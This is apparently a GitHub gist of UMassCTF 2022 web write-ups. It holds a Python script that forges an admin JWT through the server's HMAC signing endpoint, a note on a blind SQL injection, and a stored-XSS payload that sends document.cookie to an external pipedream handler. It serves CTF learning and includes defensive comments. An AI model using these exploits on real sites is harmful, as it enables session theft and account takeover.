
@krnbhargav
Last active April 4, 2022 17:24
umassctf-2022 web writeups
#!/usr/bin/env python3
from httpx import *
import base64
# Base URL of the challenge instance. Endpoint paths are appended by plain
# string concatenation below, so the trailing slash must stay.
url = "http://34.148.103.218:4829/"
def login():
    """Return the token the server issues to an unauthenticated visitor.

    Performs a GET on ``<url>login`` and reads the ``access_token_cookie``
    cookie from the response. There is no fallback if the cookie is absent.
    """
    response = get(url + 'login')
    return response.cookies['access_token_cookie']
def sign_hmac(unsigned_token):
    """Submit *unsigned_token* to ``api/sign-hmac`` and return the reply text.

    The value is sent as the ``message`` form field of a POST request.

    Security note: an endpoint that returns an HMAC over caller-chosen input
    behaves as a signing oracle. The way this script uses the reply suggests
    the endpoint shares its key with the JWT verifier; a service like this
    needs a dedicated key (or domain separation) and must never sign
    attacker-controlled strings with the session-token key.
    """
    form = {"message": unsigned_token}
    reply = post(url + 'api/sign-hmac', data=form)
    return reply.text
def get_flag(token):
    """Request ``<url>flag`` with *token* as the session cookie.

    The token is sent as ``access_token_cookie`` and the response body is
    returned as text.
    """
    session_cookies = {'access_token_cookie': token}
    reply = get(url + 'flag', cookies=session_cookies)
    return reply.text
if __name__ == "__main__":
    # Fixed header declaring an HS256 (HMAC-SHA256) JWT.
    jose_header = '{"typ":"JWT","alg":"HS256"}'

    # Decode the claims segment (the middle, dot-separated part) of the token
    # issued to an anonymous visitor. "==" is appended so that the decoder
    # always sees enough padding.
    issued_token = login()
    claims_segment = issued_token.split('.')[1]
    claims = base64.b64decode(claims_segment + '==').decode()

    # Swap the identity in the claims; this is the only change to the payload.
    claims = claims.replace("anonymous", "admin")

    # Re-encode header and claims into the "header.payload" signing input.
    header_b64 = base64.b64encode(jose_header.encode()).decode()
    claims_b64 = base64.b64encode(claims.encode()).decode()
    signing_input = header_b64 + "." + claims_b64

    # The server's own signing endpoint produces the signature; its output is
    # adjusted towards the URL-safe, unpadded form before being attached.
    # Root cause to fix server-side: the token key must not be reachable
    # through a general-purpose signing API.
    signature = sign_hmac(signing_input).replace("+", "-").replace("=", "")
    forged_token = signing_input + "." + signature

    print(get_flag(forged_token))
# flag : UMASS{W0W_TH1$_1$_4_C00L_FL4G_BRUH!_69420}

venting

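Boolean-based and time-based blind SQL injection at /fff5bf676ba8796f0c51033403b35311/login was used to recover the admin's password. (The login query presumably concatenates user input into SQL; parameterized queries remove this class of bug.)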

flag : UMASS{7H35U55Y1MP0573rCr4CK57H3C0D3}.

#!/usr/bin/env python3
from httpx import *
# Target application (a local instance here) and the external endpoint that
# receives the redirected browser request.
url = "http://127.0.0.1:7788/"
attacker_handler = "https://eogupsxh6qrqrxa.m.pipedream.net"

# Markup stored through the `essay` field. It loads the site's own
# /static/js/thing.js and supplies a crafted `data-iloveumass` attribute;
# presumably that script places the attribute value inside a string that is
# later evaluated (thing.js is not shown on this page, so confirm there).
# When the essay is rendered, the browser is sent to the handler URL with
# document.cookie in the query string.
# Defensive takeaways: HTML-encode the essay on output, mark session cookies
# HttpOnly, and do not build executable code from DOM data attributes.
payload = f'''<script id='debug' src="/static/js/thing.js" data-iloveumass="');window.location.replace(`{attacker_handler}?c=${{document.cookie}}`);//"></script>'''

if __name__ == "__main__":
    # The e-mail value is reproduced exactly as it appears on the page (it
    # looks like an e-mail-obfuscation placeholder left by the site).
    registration = {'email': '[email protected]', 'essay': payload}
    response = post(url + 'register', data=registration)
    print(response.text)
# flag : UMASS{NUMB3R_0N3_1N_$TUD3NT_D1N1NG_XD86543267!}